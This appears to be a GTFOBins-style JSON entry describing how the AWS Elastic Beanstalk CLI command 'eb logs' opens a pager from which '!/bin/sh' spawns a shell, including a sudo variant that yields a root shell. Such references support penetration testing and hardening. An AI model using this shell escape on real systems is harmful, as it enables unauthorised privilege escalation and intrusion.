You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

15 lines
378 B
JSON

{
"description": "This invokes the default logging service, which is likely to be 'journalctl', other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI.",
"functions": {
"shell": [
{
"code": "eb logs\n!/bin/sh\n"
}
],
"sudo": [
{
"code": "sudo eb logs\n!/bin/sh\n"
}
]
}
}